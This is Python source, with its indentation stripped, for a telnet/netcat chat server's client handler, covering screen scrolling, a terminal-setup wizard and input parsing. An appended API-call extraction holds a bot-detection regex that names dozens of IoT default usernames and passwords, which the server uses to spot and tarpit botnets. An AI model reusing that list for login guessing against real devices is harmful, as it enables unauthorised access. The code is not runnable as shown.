if msg_sz > ln_left:
if t_steps < 0:
vmsg.cdr -= msg_sz - ln_left
else:
vmsg.car += msg_sz - ln_left
msg_sz = ln_left
ln_left -= msg_sz
# print('@@@ 1 {0}'.format('\r\n@@@ 1 '.join(vmsg.txt[vmsg.car : vmsg.cdr])))
if t_steps < 0:
ch.vis = ch.vis[:n_msg]
else:
ch.vis = ch.vis[-n_msg:]
# glue together the 2 parts forming the formerly off-screen message
if partial_old:
if partial_old not in ch.vis:
# old segment is gone, discard it
if t_steps > 0:
partial_new.car += len(partial_old.txt)
partial_new.cdr += len(partial_old.txt)
else:
# old segment is partially or fully visible
ch.vis.remove(partial_old)
if t_steps < 0:
partial_new.cdr += partial_old.cdr
else:
if debug_scrolling:
print(
"@@@ merging old({0},{1}) new({2},{3}) olen({4}) org({5},{6})".format(
partial_old.car,
partial_old.cdr,
partial_new.car,
partial_new.cdr,
len(partial_old.txt),
partial_org.car,
partial_org.cdr,
)
)
for n, ln in enumerate(partial_old.txt):
print(ln, "---old", n)
for n, ln in enumerate(partial_new.txt):
print(ln, "+new", n)
partial_new.car += partial_old.car
partial_new.cdr += partial_old.cdr
partial_new.car += partial_org.car
partial_new.cdr += partial_org.car
partial_new.txt = partial_org.txt
partial_new.msg = partial_org.msg
if debug_scrolling:
print(
"@@@ car,cdr ({0},{1})".format(partial_new.car, partial_new.cdr)
)
# update message read state on both sides
if self.vt100:
y_pos = 2
for i, vmsg in enumerate(ch.vis):
if vmsg.car > 0:
y_pos += vmsg.cdr - vmsg.car
continue
if vmsg.unread and vmsg.msg.sno <= ch.last_read:
# print('switching message unread -> read for {0}: this({1}) last_read({2})'.format(
# ch.user.nick, vmsg.msg.sno, ch.last_read))
vmsg.unread = False
vmsg.apply_markup()
v = vmsg.txt[0]
if v and not v.startswith(u" "):
ret += u"\033[{0}H{1} ".format(y_pos, v[: v.find(" ")])
y_pos += vmsg.cdr - vmsg.car
# update the server-side screen buffer
new_screen = [self.screen[0]]
for i, vmsg in enumerate(ch.vis):
for ln in vmsg.txt[vmsg.car : vmsg.cdr]:
new_screen.append(ln)
while len(new_screen) < self.h - 2:
new_screen.append(u"--")
new_screen.append(self.screen[-2])
new_screen.append(self.screen[-1])
old_screen = self.screen
self.screen = new_screen
ch.lock_to_bottom = ch.vis[-1].msg == nch.msgs[-1] and ch.vis[
-1
].cdr == len(ch.vis[-1].txt)
# print('@@@ lock_to_bottom:', ch.lock_to_bottom)
if len(self.screen) != self.h:
print(
"!!! new screen is {0} but client is {1}".format(
len(self.screen), self.h
)
)
for n, ln in enumerate(old_screen):
print("o", ln, n)
for n, ln in enumerate(new_screen):
print("new", ln, n)
time.sleep(100000)
if not self.vt100:
if t_steps < 0:
# rely on vt100 code to determine the new display
# then retransmit the full display (good enough)
ret = self.update_chat_view(True, True, call_depth + 1)
if ret is not None:
return u"\r\n" * self.h + ret
else:
return u"\r\n" * self.h + u"somethhing broke\r\n"
if len(nch.msgs) <= ch.vis[0].im or nch.msgs[ch.vis[0].im] != ch.vis[0].msg:
print()
print("\033[1;31mcache inval: bug in update_chat_view ;_;\033[0m")
if len(nch.msgs) < 10:
print("vis.im: " + ", ".join([str(x.im) for x in ch.vis]))
print("vis.sno: " + ", ".join([str(x.msg.sno) for x in ch.vis]))
print("nch.msgs: " + ", ".join([str(x.sno) for x in nch.msgs]))
print()
# lock to bottom if all recent messages are visible
if not ch.lock_to_bottom:
vlast = ch.vis[-1]
if nch.msgs[-1] == vlast.msg and vlast.cdr == len(vlast.txt):
ch.lock_to_bottom = True
# print('update_chat: {0} runes'.format(len(ret)))
# print(' scroll_cmd: {0}'.format(self.scroll_cmd))
return ret
def conf_wizard(self, growth):
# print('conf_wizard: {0}'.format(self.wizard_stage))
if self.adr[0] == "127.0.0.1":
if u"\x03" in self.in_text:
self.world.core.shutdown()
# print('{0:8s} {1:12s} {2}'.format(self.wizard_stage, self.in_text, self.in_text_full).replace('\r','.').replace('\n','.'))
if not self.is_bot:
if self.host.re_bot.search(self.in_text_full):
self.wizard_stage = "bot1"
self.is_bot = True
m = "{0} {1}".format(self.user.nick, self.adr[0])
self.host.schedule_kick(self, 69, " botkick: " + m)
print(" is bot: " + m)
if self.wizard_stage.startswith("bot"):
nline = u"\x0d\x0a\x00"
while True:
nl = next((i for i, ch in enumerate(self.in_text) if ch in nline), None)
if nl is None:
break
growth = 0
part1 = self.in_text[:nl]
self.in_text = self.in_text[nl + 1 :].lstrip(nline)
# print(b2hex(self.in_text.encode('utf-8')))
if self.wizard_stage == "bot1":
self.say(
"\r\nSEGMENTATION FAULT\r\n\r\nroot@IBM_3090:/# ".encode(
"utf-8"
)
)
self.wizard_stage = "bot2"
elif self.wizard_stage == "bot2":
try:
self.say(
"\r\nSYNTAX ERROR: {0}\r\n\r\nroot@IBM_3090:/# ".format(
part1.strip(u"\x0d\x0a\x00 ")
).encode("utf-8")
)
except:
self.say(
"\r\nSYNTAX ERROR\r\n\r\nroot@IBM_3090:/# ".encode("utf-8")
)
else:
Util.whoops("bad bot stage: {0}".format(self.wizard_stage))
if self.wizard_stage == "bot2":
self.say(self.in_text[-growth:].encode("utf-8"))
return
sep = u"{0}{1}{0}\033[2A".format(u"\n", u"/" * 71)
ftop = u"\n" * 20 + u"\033[H\033[J"
top = ftop + u" [ r0c configurator ]\n"
if self.wizard_stage == "start":
if not self.load_config():
self.wizard_stage = "qwer_prompt"
return self.conf_wizard(growth)
self.wizard_stage = "config_reuse"
self.in_text = u""
linemode = "Yes" if int(self.linemode) == 1 else "No"
vt100 = "Yes" if int(self.vt100) == 1 else "No"
echo_on = "Yes" if int(self.echo_on) == 1 else "No"
enc_ascii = None
enc_unicode = None
for enc, uni in zip(self.codec_map[::2], self.codec_map[1::2]):
if self.codec == enc:
enc_ascii = self.codec_asc[uni]
enc_unicode = self.codec_uni[uni]
if not enc_ascii:
self.wizard_stage = "qwer_prompt"
return self.conf_wizard(growth)
to_say = (
(
top
+ u"""
verify that your config is still OK:
"""
)
.replace(u"\n", u"\r\n")
.encode("utf-8")
)
if enc_ascii == "n/a":
to_say += u" unicode / extended characters: DISABLED\r\n".encode(
"utf-8"
)
else:
to_say += u' this says "{0}": " '.format(enc_ascii).encode("utf-8")
to_say += enc_unicode.encode(self.codec, "backslashreplace")
to_say += u'"\r\n'.encode("utf-8")
to_say += (
u"""\
\033[32m this sentence is{0} green \033[0m
""".format(
u"" if self.vt100 else " NOT"
)
.replace(u"\n", u"\r\n")
.encode("utf-8")
)
ok = "your client is OK"
ng = "get better software"
to_say += (
u"""
technical details:
linemode: {l_c} ({l_g})
colors: {c_c} ({c_g})
echo: {e_c} ({e_g})
encoding: {enc_c} + {r_c}{slowmo}
Y: correct; continue
N: use another config
press Y or N, followed by [Enter]
""".format(
l_c=linemode.ljust(3),
c_c=vt100.ljust(3),
e_c=echo_on.ljust(3),
r_c=Util.b2hex(self.crlf.encode("utf-8")),
l_g=ok if not self.linemode else ng,
c_g=ok if self.vt100 else ng,
e_g=ok if not self.echo_on else ng,
enc_c=self.codec,
slowmo="\n slowmo: ENABLED" if self.slowmo_tx else "",
)
.replace(u"\n", u"\r\n")
.encode("utf-8")
)
self.say(to_say)
return
if self.wizard_stage.startswith("iface_then_"):
text = self.in_text.lower()
if u"y" in text:
ofs = self.wizard_stage.find("_then_")
self.wizard_stage = self.wizard_stage[ofs + 6 :]
elif u"n" in text:
self.host.part(self)
if self.wizard_stage == "config_reuse":
delta = len(self.in_text) - self.wizard_lastlen
self.wizard_lastlen = len(self.in_text)
if self.wizard_mindelta > delta:
self.wizard_mindelta = delta
ret_ok = self.determine_retkey(True)
if ret_ok is None:
return
text = self.in_text.lower()
if u"y" in text:
text = text[text.rfind(u"y") :]
looks_like_linemode = self.wizard_mindelta > 1
self.wizard_reuse_errors = []
if self.linemode != looks_like_linemode:
self.wizard_reuse_errors.append("linemode changed")
if not ret_ok:
self.wizard_reuse_errors.append("retkey changed")
if self.wizard_reuse_errors:
self.default_config()
if not self.check_correct_iface("reuse_impossible"):
return
else:
self.reassign_retkey(self.crlf)
if not self.check_correct_iface("end"):
return
elif u"n" in text:
self.default_config()
self.user.set_rand_nick()
if not self.check_correct_iface("qwer_prompt"):
return
if self.wizard_stage == "reuse_impossible":
self.wizard_stage = "qwer_read"
self.wizard_lastlen = 0
self.in_text = u""
self.say(
(
top
+ u"""
sorry, your config is definitely incorrect:
-- {0}
type the text below, then hit [Enter]:
qwer asdf
""".format(
"\n -- ".join(self.wizard_reuse_errors)
)
)
.replace(u"\n", u"\r\n")
.encode("utf-8")
)
# \033[10Hasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdf
return
if self.wizard_stage == "qwer_prompt":
self.wizard_stage = "qwer_read"
self.in_text = u""
self.say(
(
top
+ u"""
type the text below, then hit [Enter]:
qwer asdf
"""
)
.replace(u"\n", u"\r\n")
.encode("utf-8")
)
# \033[10Hasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdf
return
if self.wizard_stage == "qwer_read":
nline = b"\x0d\x0a\x00"
btext = self.in_text.encode("utf-8")
delta = len(self.in_text) - self.wizard_lastlen
self.wizard_lastlen = len(self.in_text)
if delta > 1:
# acceptable if delta is exactly 2
# and the final characters are newline-ish
print(
"client burst {0} {1} {2}".format(
self.user.nick, self.adr[0], delta
)
)
if delta > 2 or btext[-1] not in nline:
if self.wizard_maxdelta < delta:
self.wizard_maxdelta = delta
# if any(ch in btext for ch in nline):
nl_a = self.determine_retkey()
if nl_a is not None:
if self.wizard_maxdelta >= nl_a / 2:
self.echo_on = True
self.linemode = True
print(
"setting linemode+echo since d{0} and {1}ch; {2}".format(
self.wizard_maxdelta,
len(self.in_text),
Util.b2hex(self.in_text.encode("utf-8")),
)
)
self.wizard_stage = "echo"
join_ch = None
# cheatcode: windows netcat
if self.in_text.startswith("wncat"):
self.linemode = True
self.echo_on = True
self.vt100 = False
self.set_codec("cp437")
self.wizard_stage = "end"
# cheatcode: windows telnet + join
elif self.in_text.startswith("wtn"):
self.set_codec("cp437")
self.wizard_stage = "end"
join_ch = self.in_text[3:]
# cheatcode: linux telnet + join
elif self.in_text.startswith("ltn"):
self.set_codec("utf-8")
self.wizard_stage = "end"
join_ch = self.in_text[3:]
# this is just for the stress tests,
# i don't feel bad about this at all
if join_ch:
def delayed_join(usr, chan):
chan = chan.rstrip("\r\n\0 ") # \0 ??
time.sleep(0.2)
if chan:
print(" delay join: [{0}]".format(chan))
usr.world.join_pub_chan(usr, chan)
threading.Thread(
target=delayed_join, name="d_join", args=(self.user, join_ch)
).start()
if self.wizard_stage == "echo":
if self.linemode:
# echo is always enabled if linemode, skip this stage
if not self.check_correct_iface("linemode"):
return
else:
self.wizard_stage = "echo_answer"
self.in_text = u""
self.say(
(
u"""
A: your text appeared as you typed
B: nothing happened
press A or B&lm
"""
)
.replace(u"\n", u"\r\n")
.replace(
u"&lm", u", followed by [Enter]" if self.linemode else u":"
)
.encode("utf-8")
)
return
if self.wizard_stage == "echo_answer":
text = self.in_text.lower()
if u"a" in text:
self.echo_on = True
if not self.check_correct_iface("linemode"):
return
elif u"b" in text:
if not self.check_correct_iface("linemode"):
return
if self.wizard_stage == "linemode":
if self.linemode:
self.wizard_stage = "linemode_warn"
self.in_text = u""
self.say(
(
top
+ u"""
WARNING:
your client is stuck in line-buffered mode,
this will cause visual glitches in text input.
Keys like PgUp and CTRL-Z are also buggy;
you must press the key twice followed by Enter.
if you are using Linux or Mac OSX, disconnect and
run the following command before reconnecting:
macOS: stty -f /dev/stdin -icanon
Linux: stty -icanon
press A to accept or Q to quit&lm
"""
)
.replace(u"\n", u"\r\n")
.replace(
u"&lm", u", followed by [Enter]" if self.linemode else u":"
)
.encode("utf-8")
)
return
self.wizard_stage = "color"
if self.wizard_stage == "linemode_warn":
text = self.in_text.lower()
if u"a" in text:
self.wizard_stage = "color"
elif u"q" in text:
self.host.part(self)
if self.wizard_stage == "color":
self.wizard_stage = "color_answer"
self.in_text = u""
self.say(
(
top
+ u"""
does colours work?
\033[1;31mred, \033[32mgreen, \033[33myellow, \033[34mblue\033[0m
press Y or N&lm
"""
)
.replace(u"\n", u"\r\n")
.replace(u"&lm", u", followed by [Enter]" if self.linemode else u":")
.encode("utf-8")
)
return
if self.wizard_stage == "color_answer":
text = self.in_text.lower()
if u"y" in text:
self.wizard_stage = "codec"
self.in_text = u""
elif u"n" in text:
self.wizard_stage = "vt100"
self.in_text = u""
self.say(
(
sep
+ u"""
what did you see instead?
A: "red, green, yellow, blue"
-- either in just one colour
or otherwise incorrect colours
B: "[1;31mred, [32mgreen, [33myellow, [34mblue[0m"
press A or B&lm
"""
)
.replace(u"\n", u"\r\n")
.replace(
u"&lm", u", followed by [Enter]" if self.linemode else u":"
)
.encode("utf-8")
)
return
if self.wizard_stage == "vt100":
text = self.in_text.lower()
if u"a" in text:
# vt100 itself is probably fine, don't care
self.wizard_stage = "codec"
self.in_text = u""
elif u"b" in text:
self.wizard_stage = "vt100_warn"
self.vt100 = False
self.in_text = u""
self.say(
(
top
+ u"""
WARNING:
your client or terminal is not vt100 compatible!
I will reduce features to a bare minimum,
but this is gonna be bad regardless
whenever the screen turns too glitchy
you can press CTRL-R and Enter to redraw
or run the command "/r" if that doesn't work
press A to accept or Q to quit&lm
"""
)
.replace(u"\n", u"\r\n")
.replace(
u"&lm", u", followed by [Enter]" if self.linemode else u":"
)
.encode("utf-8")
)
return
if self.wizard_stage == "vt100_warn":
text = self.in_text.lower()
if u"a" in text:
self.wizard_stage = "codec"
self.in_text = u""
elif u"q" in text:
self.host.part(self)
AZ = u"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
if self.wizard_stage == "codec":
self.wizard_stage = "codec_answer"
self.in_text = u""
def u8(tx):
return tx.encode("utf-8", "backslashreplace")
to_send = u8(
(ftop + u'\n which line looks like "hmr" or "dna" ?').replace(
u"\n", u"\r\n"
)
)
nth = -1
if not self.vt100:
for nth, (enc, uni) in enumerate(
zip(self.codec_map[::2], self.codec_map[1::2])
):
to_send += u8(u"\r\n\r\n {0}: ".format(AZ[nth]))
try:
to_send += self.codec_uni[uni].encode(enc, "backslashreplace")
except:
to_send += u8("<codec not available>")
to_send += u8(u"\r\n")
else:
for nth, (enc, uni) in enumerate(
zip(self.codec_map[::2], self.codec_map[1::2])
):
to_send += u8(u"\033[{0}H {1}: ".format(nth * 2 + 4, AZ[nth]))
try:
to_send += self.codec_uni[uni].encode(enc, "backslashreplace")
except:
to_send += u8("<codec not available>")
to_send += u8(u"\033[J\033[{0}H\033[J".format(nth * 2 + 5))
to_send += u8(
u"\r\n press {0}{1}\r\n".format(
u"/".join(AZ[: nth + 1]),
u", followed by [Enter]" if self.linemode else u":",
)
)
self.say(to_send)
return
if self.wizard_stage == "codec_answer":
text = self.in_text.lower()
for n, letter in enumerate(AZ[: int(len(self.codec_map) / 2)].lower()):
if letter in text:
self.set_codec(self.codec_map[n * 2])
if self.crlf == u"\r\n" and self.codec != "utf-8":
self.wizard_stage = "texe"
else:
self.wizard_stage = "end"
break
if self.wizard_stage == "texe":
self.wizard_stage = "texe_answer"
self.in_text = u""
m = (
top
+ u"""
are you using telnet.exe on Windows 7 or newer?
Y: Yes; this enables slowmo (network throttle)
which avoids a rendering bug in telnet.exe
N: No, you are using another client
press Y or N&lm
"""
)
self.say(
m.replace(u"\n", u"\r\n")
.replace(u"&lm", u", followed by [Enter]" if self.linemode else u":")
.encode("utf-8")
)
return
if self.wizard_stage == "texe_answer":
text = self.in_text.lower()
if u"y" in text:
self.slowmo_tx = 1
self.in_text = u""
elif u"n" in text:
self.in_text = u""
else:
return
self.wizard_stage = "end"
if self.wizard_stage == "end":
self.save_config()
if not COLORS:
print(
"client conf: stream={0} vt100={1} no-echo={2} enc={3}\n : {4} {5}".format(
u"n" if self.linemode else u"Y",
u"Y" if self.vt100 else u"n",
u"n" if self.echo_on else u"Y",
self.codec,
self.user.nick,
self.adr[0],
)
)
else:
print(
"client conf: {0}stream {1}vt100 {2}no-echo \033[0m{3}\n : {4} {5}".format(
u"\033[1;31m" if self.linemode else u"\033[1;32m",
u"\033[32m" if self.vt100 else u"\033[31m",
u"\033[31m" if self.echo_on else u"\033[32m",
self.codec,
self.user.nick,
self.adr[0],
)
)
if self.num_telnet_negotiations == 0:
self.request_terminal_size()
self.host.unschedule_kick(self)
self.wizard_stage = None
self.in_text = u""
self.in_text_full = u""
self.user.create_channels()
if not self.slowmo_tx:
self.world.cserial += 1
def check_correct_iface(self, next_stage):
if not self.host.other_if:
return True
self.wizard_stage = next_stage
if self.iface_confirmed:
return True
self.iface_confirmed = True
to_say = None
ftop = u"\n" * 20 + u"\033[H\033[J"
top = ftop + u" [ r0c configurator ]\n"
if (
self.__class__.__name__ == "TelnetClient"
and self.num_telnet_negotiations < 1
):
print("client negs: {0} bad_if".format(self.num_telnet_negotiations))
to_say = (
top
+ u"""
your client is not responding to negotiations.
if you are NOT using Telnet,
please connect to port {0}
"""
).format(self.host.other_if)
elif (
self.__class__.__name__ == "NetcatClient"
and self.num_telnet_negotiations > 0
):
print("client negs: {0} bad_if".format(self.num_telnet_negotiations))
to_say = (
top
+ u"""
your client has sent {1} Telnet negotiation{2}.
if you are using Telnet,
please connect to port {0}
"""
).format(
self.host.other_if,
self.num_telnet_negotiations,
u"s" if self.num_telnet_negotiations != 1 else u"",
)
if to_say:
to_say += u"""
are you sure the port is correct?
Y: yes, ignore and continue
N: no, quit
press Y or N, followed by [Enter]
"""
self.in_text = u""
self.wizard_stage = "iface_then_" + next_stage
self.say(to_say.replace(u"\n", u"\r\n").encode("utf-8"))
return False
print("client negs: {0} ok".format(self.num_telnet_negotiations))
return True
def read_cb(self, full_redraw, growth):
# only called by (telnet|netcat).py:handle_read,
# only called within locks on self.world.mutex
# self.wizard_stage = None
if self.wizard_stage is not None:
self.conf_wizard(growth)
if self.wizard_stage is not None:
return
full_redraw = True
old_cursor = self.linepos
esc_scan = True
while esc_scan:
esc_scan = False
aside = u""
for nth, ch in enumerate(self.in_text):
was_esc = None
if aside and aside in self.esc_tab:
# text until now is an incomplete escape sequence;
# if the new character turns into an invalid sequence
# we'll turn the old one into a plaintext string
was_esc = aside
aside += ch
csi = (aside == u"\033") or aside.startswith(u"\033[")
bad_csi = csi and len(aside) > 12
if aside not in self.esc_tab and (bad_csi or not csi):
if bad_csi:
# escape the ESC and take it from the top:
# there might be esc_tab sequences within
self.in_text = u"[ESC]" + aside[1:] + self.in_text[nth + 1 :]
esc_scan = True
break
if was_esc:
# new character made the escape sequence invalid;
# print old buffer as plaintext and create a new
# escape sequence buffer for just the new char
if ch in self.esc_tab:
# ...but only if the new character is
# potentially the start of a new esc.seq.
aside = was_esc
else:
# in this case it isn't
was_esc = False
self.linebuf = (
self.linebuf[: self.linepos]
+ Util.sanitize_ctl_codes(aside)
+ self.linebuf[self.linepos :]
)
self.linepos += len(aside)
self.msg_not_from_hist = True
self.msg_hist_n = None
self.tabcomplete_end()
if was_esc:
aside = ch
else:
aside = u""
else:
# this is an escape sequence; handle it
act = False
if aside in self.esc_tab:
act = self.esc_tab[aside]
if not act:
if not csi:
continue
m = self.re_cursor_pos.match(aside)
if not m:
continue
sh, sw = [int(x) for x in m.groups()]
self.pending_size_request = False
self.handshake_sz = True
if self.w != sw or self.h != sh:
full_redraw = True
self.set_term_size(sw, sh)
aside = aside[len(m.group(0)) :]
continue
if self.ar.dbg:
print(" escape seq: {0} = {1}".format(Util.b2hex(aside), act))
if self.tc_nicks and act != "tab":
self.tabcomplete_end()
hist_step = 0
chan_shift = 0
aside = u""
if act == "cl":
self.linepos -= 1
if self.linepos < 0:
self.linepos = 0
elif act == "cr":
self.linepos += 1
if self.linepos > len(self.linebuf):
self.linepos = len(self.linebuf)
elif act == "cu":
hist_step = -1
if self.echo_on:
self.need_full_redraw = True
elif act == "cd":
hist_step = 1
elif act == "home":
self.linepos = 0
elif act == "end":
self.linepos = len(self.linebuf)
elif act == "bs":
if self.linepos > 0:
self.linebuf = (
self.linebuf[: self.linepos - 1]
+ self.linebuf[self.linepos :]
)
self.linepos -= 1
elif act == "ret":
if self.echo_on:
self.need_full_redraw = True
if self.linebuf:
# add this to the message/command ("input") history
if not self.msg_hist or self.msg_hist[-1] != self.linebuf:
self.msg_hist.append(self.linebuf)
self.msg_not_from_hist = False
self.pending_size_request = False
single = self.linebuf.startswith("/")
double = self.linebuf.startswith("//")
if single and not double:
# this is a command
self.user.exec_cmd(self.linebuf[1:])
else:
if double:
# remove escape character
self.linebuf = self.linebuf[1:]
self.world.send_chan_msg(
self.user.nick,
self.user.active_chan.nchan,
Util.convert_color_codes(self.linebuf),
)
self.msg_hist_n = None
self.linebuf = u""
self.linepos = 0
elif act == "pgup" or act == "pgdn":
steps = self.h - 4
if self.scroll_i is not None:
steps = self.scroll_i
elif self.scroll_f is not None:
steps = int(steps * self.scroll_f)
else:
print("no scroll size?!")
if act == "pgup":
steps *= -1
self.scroll_cmd = steps
elif act == "redraw":
self.user.exec_cmd("r")
elif act == "prev-chan":
chan_shift = -1
elif act == "next-chan":
chan_shift = +1
elif act == "alt-tab":
self.user.exec_cmd("a")
elif act == "tab":
self.tabcomplete()
else:
print("unimplemented action: {0}".format(act))
if chan_shift != 0:
i = self.user.chans.index(self.user.active_chan) + chan_shift
if i < 0:
i = len(self.user.chans) - 1
if i >= len(self.user.chans):
i = 0
self.user.new_active_chan = self.user.chans[i]
elif hist_step == 0:
self.msg_hist_n = None
else:
if self.msg_hist_n is None:
if hist_step < 0:
self.msg_hist_n = len(self.msg_hist) - 1
else:
self.msg_hist_n += hist_step
if self.msg_hist_n is not None:
if self.msg_hist_n < 0 or self.msg_hist_n >= len(
self.msg_hist
):
self.msg_hist_n = None
# capture unfinished entries so they can be resumed
if self.linebuf and self.msg_not_from_hist:
self.msg_hist.append(self.linebuf)
self.msg_not_from_hist = False
if self.msg_hist_n is None:
self.linebuf = u""
else:
self.linebuf = self.msg_hist[self.msg_hist_n]
self.linepos = len(self.linebuf)
if aside:
if self.ar.dbg:
print(
"need more data for {0} runes: {1}".format(
len(aside), Util.b2hex(aside)
)
)
self.in_text = aside
else:
self.in_text = u""
if self.w < 20 or self.h < 4:
msg = "x"
for cand in self.msg_too_small:
# print('{0} <= {1}'.format(len(cand), self.w))
if len(cand) <= self.w:
msg = cand
break
y = int(self.h / 3)
x = int((self.w - len(msg)) / 2)
x += 1
y += 1
print("2smol @ {0} {1}".format(x, y))
msg = u"\033[H\033[1;37;41m\033[J\033[{0};{1}H{2}\033[0m".format(y, x, msg)
self.say(msg.encode(self.codec, "backslashreplace"))
self.too_small = True
return
self.too_small = False
if (
self.size_request_action
and not self.pending_size_request
and self.size_request_action == "redraw"
):
self.size_request_action = None
full_redraw = True
if self.ar.dbg:
if self.dead:
print("CANT_ANSWER: dead")
if not self.handshake_sz:
print("CANT_ANSWER: handshake_sz")
if not self.handshake_world:
print("CANT_ANSWER: handshake_world")
if not self.dead:
with self.world.mutex:
if full_redraw:
self.need_full_redraw = True
if self.handshake_sz:
self.refresh(old_cursor != self.linepos)
def tabcomplete(self):
if self.tc_nicks:
self.tabcomplete_cycle()
else:
self.tabcomplete_init()
def tabcomplete_init(self):
try:
chan = self.user.active_chan.nchan
except:
return
txt = self.linebuf[: self.linepos]
ofs = txt.rfind(" ")
if ofs >= 0:
prefix = txt[ofs + 1 :].lower()
else:
prefix = txt.lower()
self.tc_nicks = [prefix]
for usr, ts in reversed(
sorted(chan.user_act_ts.items(), key=operator.itemgetter(1))
):
if usr != self.user.nick and usr.lower().startswith(prefix):
self.tc_nicks.append(usr)
if len(self.tc_nicks) == 1:
self.tc_nicks = None
return
self.tc_msg_pre = self.linebuf[: self.linepos - len(prefix)]
self.tc_msg_post = self.linebuf[self.linepos :]
self.tc_n = 0
self.tabcomplete_cycle()
def tabcomplete_cycle(self):
self.tc_n += 1
if self.tc_n >= len(self.tc_nicks):
self.tc_n = 0
if not self.tc_msg_pre:
nick_suffix = u": "
else:
nick_suffix = u" "
nick = self.tc_nicks[self.tc_n]
if nick == "":
nick_suffix = u""
self.linebuf = self.tc_msg_pre + nick + nick_suffix
self.linepos = len(self.linebuf)
self.linebuf += self.tc_msg_post
def tabcomplete_end(self):
self.tc_nicks = None
self.tc_post = None
self.tc_pre = None
|
[
"threading.Thread",
"socket.socket",
"time.strftime",
"time.time",
"time.sleep",
"datetime.datetime.utcnow",
"os.path.isfile",
"datetime.datetime.utcfromtimestamp",
"binascii.unhexlify",
"socket.getpeername",
"operator.itemgetter",
"queue.Queue",
"re.compile"
] |
[((746, 1323), 're.compile', 're.compile', (["('root|Admin|admin|default|support|user|password|telnet|' +\n 'guest|operator|supervisor|daemon|service|enable|system|' +\n 'manager|baby|netman|telecom|volition|davox|sysadm|busybox|' +\n 'tech|888888|666666|mg3500|merlin|nmspw|super|setup|vizxv|' +\n 'HTTP/1|222222|xxyyzz|synnet|PlcmSpIp|Glo|e8ehome|xc3511|' +\n 'taZz@|aquario|1001chin|Oxhlw|S2fGq|Zte521|ttnet|tlJwp|' +\n 't0tal|gpon|anko|changeme|hi3518|antslq|juantech|zlxx|' +\n 'xmhdipc|ipcam|cat10|synnet|ezdvr|vstarcam|klv123|' +\n 'ubnt|hunt57|Alphanet|epicrout|annie20|realtek|netscreen')"], {}), "('root|Admin|admin|default|support|user|password|telnet|' +\n 'guest|operator|supervisor|daemon|service|enable|system|' +\n 'manager|baby|netman|telecom|volition|davox|sysadm|busybox|' +\n 'tech|888888|666666|mg3500|merlin|nmspw|super|setup|vizxv|' +\n 'HTTP/1|222222|xxyyzz|synnet|PlcmSpIp|Glo|e8ehome|xc3511|' +\n 'taZz@|aquario|1001chin|Oxhlw|S2fGq|Zte521|ttnet|tlJwp|' +\n 't0tal|gpon|anko|changeme|hi3518|antslq|juantech|zlxx|' +\n 'xmhdipc|ipcam|cat10|synnet|ezdvr|vstarcam|klv123|' +\n 'ubnt|hunt57|Alphanet|epicrout|annie20|realtek|netscreen')\n", (756, 1323), False, 'import re\n'), ((1539, 1588), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (1552, 1588), False, 'import socket\n'), ((2022, 2057), 'time.strftime', 'time.strftime', (['"""%d/%m/%Y, %H:%M:%S"""'], {}), "('%d/%m/%Y, %H:%M:%S')\n", (2035, 2057), False, 'import time\n'), ((4991, 5002), 'time.time', 'time.time', ([], {}), '()\n', (5000, 5002), False, 'import time\n'), ((8062, 8069), 'queue.Queue', 'Queue', ([], {}), '()\n', (8067, 8069), False, 'from queue import Queue\n'), ((8093, 8100), 'queue.Queue', 'Queue', ([], {}), '()\n', (8098, 8100), False, 'from queue import Queue\n'), ((9455, 9503), 're.compile', 're.compile', (['"""\\\\033\\\\[([0-9]{1,4});([0-9]{1,4})R"""'], {}), "('\\\\033\\\\[([0-9]{1,4});([0-9]{1,4})R')\n", (9465, 9503), False, 'import re\n'), ((11298, 11359), 'threading.Thread', 'threading.Thread', ([], {'target': 'self.handshake_timeout', 'name': '"""hs_to"""'}), "(target=self.handshake_timeout, name='hs_to')\n", (11314, 11359), False, 'import threading\n'), ((17380, 17393), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (17390, 17393), False, 'import time\n'), ((7646, 7668), 'os.path.isfile', 'os.path.isfile', (['log_fn'], {}), '(log_fn)\n', (7660, 7668), False, 'import os\n'), ((5602, 5639), 'os.path.isfile', 'os.path.isfile', (['self.user_config_path'], {}), '(self.user_config_path)\n', (5616, 5639), False, 'import os\n'), ((29302, 29319), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (29317, 29319), False, 'from datetime import datetime\n'), ((31323, 31334), 'time.time', 'time.time', ([], {}), '()\n', (31332, 31334), False, 'import time\n'), ((37291, 37324), 'datetime.datetime.utcfromtimestamp', 'datetime.utcfromtimestamp', (['msg.ts'], {}), '(msg.ts)\n', (37316, 37324), False, 'from datetime import datetime\n'), ((61845, 61863), 'time.sleep', 'time.sleep', (['(100000)'], {}), '(100000)\n', (61855, 61863), False, 'import time\n'), ((7583, 7594), 'time.time', 'time.time', ([], {}), '()\n', (7592, 7594), False, 'import time\n'), ((22899, 22952), 'threading.Thread', 'threading.Thread', ([], {'target': 'delayed_drop', 'name': '"""dropcli"""'}), "(target=delayed_drop, name='dropcli')\n", (22915, 22952), False, 'import threading\n'), ((96904, 96926), 'operator.itemgetter', 'operator.itemgetter', (['(1)'], {}), '(1)\n', (96923, 96926), False, 'import operator\n'), ((13159, 13183), 'binascii.unhexlify', 'binascii.unhexlify', (['crlf'], {}), '(crlf)\n', (13177, 13183), False, 'import binascii\n'), ((22528, 22541), 'time.sleep', 'time.sleep', (['(5)'], {}), '(5)\n', (22538, 22541), False, 'import time\n'), ((73635, 73650), 'time.sleep', 'time.sleep', (['(0.2)'], {}), '(0.2)\n', (73645, 73650), False, 'import time\n'), ((2838, 2858), 'socket.getpeername', 'socket.getpeername', ([], {}), '()\n', (2856, 2858), False, 'import socket\n'), ((73838, 73917), 'threading.Thread', 'threading.Thread', ([], {'target': 'delayed_join', 'name': '"""d_join"""', 'args': '(self.user, join_ch)'}), "(target=delayed_join, name='d_join', args=(self.user, join_ch))\n", (73854, 73917), False, 'import threading\n'), ((7799, 7810), 'time.time', 'time.time', ([], {}), '()\n', (7808, 7810), False, 'import time\n'), ((20797, 20808), 'time.time', 'time.time', ([], {}), '()\n', (20806, 20808), False, 'import time\n'), ((32430, 32441), 'time.time', 'time.time', ([], {}), '()\n', (32439, 32441), False, 'import 